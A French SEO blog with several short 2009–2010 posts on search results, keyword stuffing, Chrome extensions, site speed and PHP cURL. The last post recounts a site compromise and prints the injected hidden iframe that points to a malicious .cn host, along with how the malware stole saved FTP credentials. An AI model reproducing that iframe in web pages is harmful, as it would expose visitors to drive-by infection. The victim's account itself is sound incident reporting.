Le conseil régional d’Île de France : vSEO fail …
26/01/10
vSEO fail
Il y a quelques jours en tapant Ile de France sur Google.fr, j’ai été assez amusé de voir une vidéo, extraite de la recherche universelle, intitulée « Erreur ! – Conseil régional d’Île-de-France ». Et en effet quand on clique dessus on peut voir une magnifique page d’erreur 404, qui répond d’ailleurs en 200 OK … Au delà du gros SEO fail pour le conseil régional, cela nous apprend des petites choses sur la différence de crawl entre le crawler vidéo et le crawler pour les url et title. Le crawler vidéo semble beaucoup plus lent et ne s’est pas encore rendu compte que la vidéo était supprimée. Je ne sais pas exactement si on peut exploiter cette faille pour optimiser les pages (un blackhat ou un googler passant dans le coin aurait-il une idée?).
Quelques conseils
Je vais terminer avec quelques conseils pour le webmaster (ou le SEO) du conseil régional d’Île-de-France:
- Toujours effectuer des redirections 301 quand on déplace un contenu. Si le contenu disparaît totalement, il faut renvoyer une erreur 410
- Empêcher l’indexation de la page d’erreur 404
- Vérifier régulièrement l’état de l’indexation sur ses principaux mots-clés et agir en conséquence
google-analytics.com dans mes sites référents
16/01/10
En regardant de près mes dernières stats Analytics pour mes deux principaux sites ludeales.com et litterales.com, j’ai remarqué un étrange site referrer : google-analytics.com/ga.js
Apparemment, cela ne concerne que quelques personnes (principalement des Normands, .. une conspiration? ). Y aurait-il un logiciel qui envoie exprès un mauvais referrer pour ne pas être repéré par Analytics. Cela me semble un peu étrange, mais je ne vois pas trop d’autres explications. Etrange, étrange. Quelqu’un aurait-il une idée?
Gâteau au chocolat et Keyword stuffing
31/12/09
Aujourd’hui, dernier jour de l’année; le temps d’écrire un dernier post et de faire un beau gâteau au chocolat pour mes invités
Je tape donc « gâteau chocolat » sur Google, pour tomber sur le site très « on topic » : http://www.gateau-au-chocolat.com/ bien pratique, pas trop MFA et avec une vraie recette. Je m’en vais donc l’imprimer à l’adresse suivante http://www.gateau-au-chocolat.com/recette-gateau-au-chocolat-sans-photos.html et je remarque tout un horrible tas de mots-clés en bas de page… Je me dis donc que
- il risque de se faire pénaliser un de ces quatre
- c’est bien inutile parce qu’une suite de noms sans mots-outils, virgules ou majuscules, c’est un peu le cas d’école du bourrage de mots-clés!
- il me fait dépenser une feuille de plus à imprimer pour ses mots-clés à la noix !!
- … et au passage pour gâteau au chocolat, mettre comme mot clé : noix oeufs orange pain pate patisserie personnes photo photos plats pommes : c’est stupide !
Cela dit, ce n’est pas la première fois que je suis sa recette et elle est toujours très bonne
Je ne vais pas tout de même pas terminer l’année par un Spam Report. D’ailleurs, j’en profite pour souhaite à tous les (peu) nombreux lecteurs de ce blog une très bonne année 2010 pleine de bons positionnements
Carrefour ne sait pas photoshoper ses pubs…
29/12/09
Un petit post qui n’a rien à voir avec le SEO …
Hier, j’attendais le RER et je regardais avec intérêt la pub Carrefour pour le Netbook HP à 300€. Premier réflexe évidemment, je regarde comment sont agencées les touches : rien de plus désagréable qu’une barre espace trop petite ou une touche entrée mal placée. En regardant de plus près, horreur, aucune touche n’est à sa place: aucun accent, aucune cédille… et pourtant, c’est un azerty ! Azerty ? vraiment? En fait, non… C’est un qwerty où le A et le Q ont été inversés. Même le M est resté à la mauvaise place près du N: pas très fort en photoshop (ou en clavier) le stagiaire qui a fait ça … hé hé
La preuve en image :
En y pensant, cela a un peu à voir avec l’ergonomie… les détails comptent, surtout quand ils font plusieurs mètres de haut !
10 extensions SEO pour Chrome
27/12/09
Depuis quelques jours, Chrome, mon navigateur préféré a enfin sorti la possibilité d’ajouter des extensions. Vous allez me dire, Firefox le fait déjà. Récapitulons quelques avantages de Chrome
- Plus rapide
- Interface moins chargée
- Pas besoin de relancer le navigateur lors de l’ajout d’une nouvelle extension ! Et ça, c’est bon pour les tests !!!
- … Et petit rappel, pour installer les extensions, vous devez avoir la version beta.
Voici donc une petite liste des extensions SEO que je trouve actuellement les plus utiles pour le SEO :
Les principaux
- PageRank : Comme son nom l’indique, affiche juste le PageRank de la page.
- Meta SEO inspector : Permet d’afficher les balises meta dans une petite info-box. Montre aussi les liens nofollow.
- Pendule : Montre les balises alt, désactive les CSS
Autres extensions pour SEO :
- SEO : Affiche une barre verticale avec des stats comme nombre de mots, fréquence, mais aussi des liens vers les principaux social bookmarks. Rien de bien révolutionnaire.
- Chrome SEO : Plus utile car mieux présenté. Encore en construction, mais permet d’avoir des liens (et parfois des chiffres) vers le nombre de pages indexées dans les moteur ou le nombre de backlinks.
- Chrome flags : Affiche le drapeau dans la barre d’adresse du pays de provenance (basé sur l’IP du serveur)
- Analytics Helper : Affiche une icone si Analytics est installé sur la page visitée
Autres extensions assez utiles :
- Picnik Extension for Chrome : Permet de sauvegarder et d’éditer facilement les images présentes sur la page ou l’intégralité de la page. Malheureusement assez lent.
- Intersect : Permet de connaître les contacts communs sur twitter.
- Cookie Editor : Permet de changer facilement ses cookies. Pratique pour débuguer.
Et vous, utilisez-vous d’autres extensions bien utiles? J’ai l’espoir que d’ici 6 mois, Chrome rattrapera son retard en add-ons par rapport à Firefox…
Google et la performance des sites : une vision très américaine?
6/12/09
Depuis quelques jours, Google a installé une nouvelle fonctionnalité dans les outils pour webmasters : la mesure de performance des sites. En effet, Google prendrait de plus en plus en compte la vitesse des sites pour déterminer son classement. J’ai donc testé assez rapidement ce nouveau service. Et je me suis rendu compte que ce n’était pas bien brillant : 2.8 secondes à charger ! C’est beaucoup…
La performance de mon site Litterales.com
Performance de litterales.com sur GWT
Une performance américano-centrée?
Etrangement, les statistiques d’InternetVista m’indique aussi souvent un temps maximal de réponse de 3 secondes, en provenance de leur data center du Texas. Par contre, en moyenne, mes temps de réponse sont de 0.25 secondes. Ma question est la suivante : la performance d’un site est-elle calculée exclusivement à partir de data center américain? Ou alors est-ce calculé par rapport au visiteurs réels?
Plus étrange encore est ce pic de lenteur au milieu du mois d’août. Je n’ai rien fait de particulier sur mon site à cette époque. Au contraire, je suis même descendu en dessous de 1 seconde pour l’ensemble des pings dans cette période (effet vacances scolaires). Toutes ces imprécisions n’envisagent rien de bon pour le calme des référenceurs qui vont s’arracher les cheveux pour quelques maigres secondes. Certes, cela changera du PageRank mais tout cela est-il bien raisonnable?
Conclusion
En tout cas, cette nouvelle donnée m’a incité à enfin utiliser gzip pour renvoyer mes fichiers html, css, js et de mettre en cache une bonne partie de mes fichiers. Dans quelques semaines, je pourrais tester le résultat de ces actions sur Google et sur InternetVista. Quant aux positionnements,… je vous parie un lien optimisé que ça ne changera pas tant !
Créer un mock-up rapidement avec Balsamiq
6/09/09
Est-ce que cela vous est déjà arrivé de chercher à faire un design de site web de manière rapide et sommaire, mais efficace? Le plus souvent, vuos allez avoir recours à l’éternel crayon papier pour avoir la liberté totale. Si vous voulez une version électronique, vous allez vous essayer avec Gimp ou Photoshop (selon vos moyens) et assez vite vous arracher les cheveux avec l’interface.

Mais, maintenant, il y a une solution avec www.balsamiq.com, plus besoin de se prendre la tête à essayer de dessiner un calendrier, un champ de recherche, un champ vidéo … tout cela est déjà dessiné par défaut. Evidemment, vous n’allez pas vraiment pouvoir décider des couleurs et des détails de l’agencement, mais vous vous concentrez sur l’essentiel.
Je vous conseille franchement d’essayer, d’autant plus qu’on peut tout de même aller assez loin avec la version d’essai.

Google se plie à la justice
20/08/09
Quand je vois des titres comme Google forcé par la justice à dévoiler l’identité d’une blogueuse, je me dis : ouah, Google s’est plié à la justice et a révélé une partie de ses logs de son moteur de recherche pour livrer un méchant blogueur. Et je parie que la plupart des personnes voyant ce titre se dise : « J’avais bien raison de me méfier de Google ». Mais, il n’en est rien. En fait, il s’agit de Google, comme entreprise et non comme moteur de recherche parce qu’il s’agit de la plateforme de blogs Blogger (aka Blogspot). Et il est tout à fait logique que si quelqu’un poste publiquement des textes illégaux (diffamatoires en l’occurrence) que l’hébergeur livre les adresses IP.
Pour la petite histoire, moi-même en tant qu’hébergeur, j’ai eu une réquisition judiciaire me demandant quelques adresses IP, je me suis obtempéré. Et je n’ai pas l’impression d’avoir mal fait. Si la justice le demande, c’est qu’ils veulent enquêter. Je ne crois pas que ce soit le rôle de l’hébergeur de bloquer la justice à ce niveau.
Librairie PHP Curl : comment créer des outils SEO en quelques heures
20/08/09
Je viens de découvrir ce week-end l’existence d’une librairire PHP que je ne connaissais pas : Curl. En deux mots, cette librairie vous permet de simuler l’envoi d’un header et de récupérer les données pour les traiter ensuite. C’est bien plus efficace que l’usual file_get_contents car on peut spécifier quel header on peut envoyer et donc il y a beaucoup moins de chance d’être bloqué par les serveurs.
Installation
Rien de plus simple. Comme toute bonne librairie php, un petit apt-get install php5-curl puis un reboot d’Apache pour être bien sûr et le tour est joué. Un phpinfo() me confirme que Curl est bien installé.
Utiliser Curl
En fait, il existe assez peu de fonction dans Curl et elles sont bien documentées dans la doc officielle. La fonction principale est curl_setopt. Vous pouvez ajouter ainsi différentes options à votre recopiage (vol de contenu). La principale option que je vous recommande est CURLOPT_RETURNTRANSFER qui, par défaut est à FALSE et donc au lieu d’enregistrer la page web, l’affiche. Ce n’est pas le comportement que j’attendais. Je n’ai pas encore réussi à utiliser Curl uniquement côté serveur, style en cgi et donc à chaque fois que je lance un crawl, la page met trois heures à charger. Pas très pratique…
Idées d’utilisation
- Outils d’analyse de backlinks
- Vérification des positions sur Google
- Récupération automatique de listes de mots-clés à partir de Suggets, Adwords suggestion …
- Génération automatique de texte à partir d’autres sites… mmm that sounds black-hat
- …
Comment je me suis fait hacker
2/08/09
Cela fait plus d’un mois que je n’ai pas écrit sur le blog. J’ai pas mal de raisons pour cela: vacances, beau temps, changement de pays, changement de boulot et … le hacking.
Petit historique:
- Il y a quelques mois, je clique sur une pub Adwords. Chrome m’indique que le site peut infecter mon ordinateur. Je me dis naïvement : « Oh, c’est bon, j’en vois des dizaines de sites comme ça tous les jours. Cela va être un popup qui me fait croire que j’ai un virus. Il suffit juste que je ne clique pas sur exécuter, je connais la procédure ». Mais sans rien cliquer, je vois que plein de popup pour des faux antivirus apparaissent, mais pas des fenêtres de navigateurs; de vrais logiciels,… bref j’étais infecté. Après quelques bonnes heures à passer plusieurs antivirus (j’utilisais Nod32 à l’époque), je réussis à nettoyer l’infection. Ou en tout cas, l’infection semble relativement disparue, même si j’ai encore quelques alertes régulières quand je démarre mon PC. Dans un coin de ma tête, je me dis qu’il faut que je réinstalle Windows un de ces jours, mais je m’arrête là.
-Fin juin (donc plusieurs mois après cette infection), ma compagne me dit que notre site a une page d’erreur sur la page d’accueil et qu’elle a réuploadé la page index.php . Aussitôt, cela me met une grosse puce à l’oreille puisque je n’ai pas uploadé le fichier index depuis plusieurs mois. Bref, si erreur il y a, intrusion il y a aussi. Après vérification, je découvre le pot aux roses. Ma page index.php avait été modifié, à la barbare. Une petite ligne avait été ajouté dans le code php :
<iframe src="http://globalmixgroup.cn :8080/ts/in.cgi?pepsi65" width=125 height=125 style="visibility: hidden"></iframe>
Evidemment,cela entrainait une erreur lors de l’affichage de la page puisque les fonctions php étaient coupée
s au milieu.
Après quelques tests, je me suis rendu compte que le hacker avait accès à mes comptes ftp enregistrés sur Filezilla. En attendant de pouvoir réinstaller Windows, j’ai donc fermé tout accès ftp sur l’ensemble des sites hébergés sur mon serveur. Voici , en tout cas, ce que j’ai pu remarquer du comportement du virus:
- Il regarde, dans tous les sous-répertoires, tous les fichiers index (.php / .html ) ainsi que les fichiers comportant le mot-clé default.
- Dans ces fichiers, il vérifie s’il y a la balise <body> et ajoute à la suite une iframe externe pointant vers un .cn ou vers un .info. S’il ne trouve pas la balise <body>, il supprimera les derniers caractères de la page et ajoutera l’iframe même si le fichier est en php et non en html.
Bref, cela m’a fait perdre de nombreuses heures, surtout que j’ai eu des problèmes en réinstallant Windows, mais ça, c’est une autre histoire…





